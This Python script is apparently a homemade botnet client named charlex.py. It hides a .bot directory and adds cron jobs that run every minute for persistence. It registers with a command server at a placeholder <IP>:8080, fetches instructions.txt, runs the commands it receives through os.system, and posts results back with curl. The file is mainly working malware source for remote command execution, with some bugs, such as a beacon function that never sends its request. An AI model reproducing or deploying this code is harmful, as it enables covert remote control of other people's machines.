#!/usr/bin/env python3

import sys
import os
import requests
from datetime import datetime
import time

# 
def cronjobs():
	whoami = os.getcwd()+"/charlex.py"
	start = '(crontab -l 2>/dev/null; echo "0 12 * * * '+whoami+'  >/dev/null >/dev/null 2>&1") | crontab -'
	beacon = '(crontab -l 2>/dev/null; echo "* * * * * '+whoami+' beacon >/dev/null >/dev/null 2>&1")| crontab -'
	instructions = '(crontab -l 2>/dev/null; echo "* * * * * '+whoami+' instructions >/dev/null >/dev/null 2>&1")| crontab -'
	os.system(start)
	os.system(beacon)
	os.system(instructions)
def directoryhandler():
	dir = os.path.join('./','.bot')
	if not os.path.exists(dir):
		os.mkdir(dir)
		os.chdir(dir)
		f = open('name.txt', 'w+')
		f.write('')
		f.close()
	else:
		os.chdir(dir)
def namecheck():
	botnames = requests.get('http://<IP>:8080/botnames.txt')
	data = botnames.text.strip().split()
	lastbot = data[-1]
	with open('name.txt', 'r+') as f:
		if f not in data:
			myname = str(int(lastbot)+1)
			f.write(myname)
			request = 'curl -d '+myname+' http://<IP>:8080/log.txt'
			os.system(request)
		else:
			close()
def beacon():
	myname = open('name.txt', 'r')
	x = datetime.now()
	current_time = x.strftime("%H:%M:%S")
	data = current_time+' Online '+myname.read()
	request = 'curl -d "'+data+'" http://<IP>:8080/log.txt'
	starttime = time.time()

def instructions():
	dir = os.path.join('./','.bot')
	os.chdir(dir)
	os.system('curl <IP>:8080/instructions.txt > response.txt')
	os.system('cat name.txt > sendthis.txt')
	with open('response.txt') as input_file:
		myname = open('name.txt', 'r').read()
		command = ''
		for line in input_file:
			bot = line.split("'")[0]
			if bot == myname or bot == 'any':
				command += line.split("'")[1]
		os.system(command)
		os.system('curl -d @./sendthis.txt <IP>/instructions.txt')
		os.system('rm sendthis.txt response.txt')





if __name__ == '__main__':
	if len(sys.argv) == 1:
		directoryhandler()
		namecheck()
		cronjobs()
	elif sys.argv[1] == 'beacon':
		beacon()
	elif sys.argv[1] == 'instructions':
		instructions()
